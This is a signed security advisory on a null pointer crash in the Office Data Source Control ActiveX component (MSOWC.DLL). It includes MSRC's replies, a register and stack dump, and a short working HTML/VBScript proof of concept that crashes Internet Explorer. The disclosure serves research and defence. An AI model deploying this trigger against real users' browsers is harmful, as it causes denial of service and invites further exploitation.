-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -----------------------------------------------------------------------------
Microsoft Office Data Source Control 9.0 (MSOWC.DLL) Null Pointer DoS
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/
File: MSOWC.DLL
Ver.: 9.0.0.8966
ProgID: OWC.DataSourceControl.9
Descr.: Microsoft Office Data Source Control 9.0
Marked: RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety:True
IDisp Safe: Safe for untrusted: caller
Member: DeleteRecordSourceIfUnused (ByVal RecordSource As String)
According to MSRC:
"In triaging this it appears that this control has alredy had a killbit
released as part of an OWC patch (MS08-017).
Also, kill-bitted by IE in
http://www.microsoft.com/technet/security/advisory/956391.mspx
Unless I am missing a detail here or if the killbit was unsuccessful,
the MSRC won't open a new case for this control."
and:
"From our assessment this looks to be a non-exploitable null pointer."
This is a report of the crash:
Dump:
3AD28D0A . 8B40 50 MOV EAX,DWORD PTR DS:[EAX+50]; <== CRASH
Registers:
EAX 00000000
ECX 0292009C
EDX 0021FFF2
EBX 029200FC
ESP 0161D258
EBP 0161D284
ESI 0161D278
EDI 0161D25C
EIP 3AD28D0A MSOWC.3AD28D0A
Stack:
ESP ==> > 00000008
ESP+4 > 0292009C
ESP+8 > 3AD28CDA RETURN to MSOWC.3AD28CDA from MSOWC.3AD2A6C4
ESP+C > 01F09C64 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
So if someone find a way to manipulate EAX, code execution is possible.
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 full patched, with Internet Explorer 8
- ------------------------------------------------------------------------------
<object classid='clsid:0002E533-0000-0000-C000-000000000046' id='test'></object>
<script language='vbscript'>
test.DeleteRecordSourceIfUnused String(1024, "A")
</script>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
iQIcBAEBAgAGBQJK7+4+AAoJEGLxkZuDw5+s6VwP/0D8HgkLDQS3kd8uD+EYv4Vy
9/w0k90y2lweRZCduKg+lz6hUAtPSLxecVMe8Wh/0HvIabhj/juUImVH5QxILuYZ
D67Q8KLoilwL0FAvWdgIiHCIE/5StwvmcHOs1chhUgGnVrI/7cxN8u1dx064eJ6G
KQenwcC42LfNJNlGIUREdkeWdo/XOCefmuGjPNv8HIbh3/0konEExKbitw+xSKId
tIJlPEYOuHYMEziiyxfTnRVbo9c5PGoo7YGIyk6YcpXTCj37AggJaRx7EgL4Wzj2
E/WXIeyjsQfmyntgrpIDuNjA3Wp0zZDVTJN8LDyzwb/aexD9oXM+t0de4Yu/WBZ4
Wvi3ZnkG2dhGxhDGUOCmrNykeF3/YfsJuz2HHxD3enDI6sNyxHNXnjF9CiNJfm+O
dIqvlA9Qom1yHqoZivAwx7zp4+zPcpSNhLR3kf5VGgKTKqSPOEZterufMICjBK64
PlZU/i3rFJ7bH3jwXjwSfwhVgzAboaKFtoE0v6yQlizuOMZGb9M9C2XAjDSxp7yk
CZC6ZAxvM3VyI9cJ67wX4AB+0D/WtTUP74nuxywbXkY4DrAHlEStYCa+O8EFbwQy
X9iJ9cYihDSB1jgKykybrbGGVQfjacm/GT/L9CLjoOj82LreSVJldh9P0lsgmCP4
MmF+lIUX4OoYHuqdpJsb
=gH6Q
-----END PGP SIGNATURE-----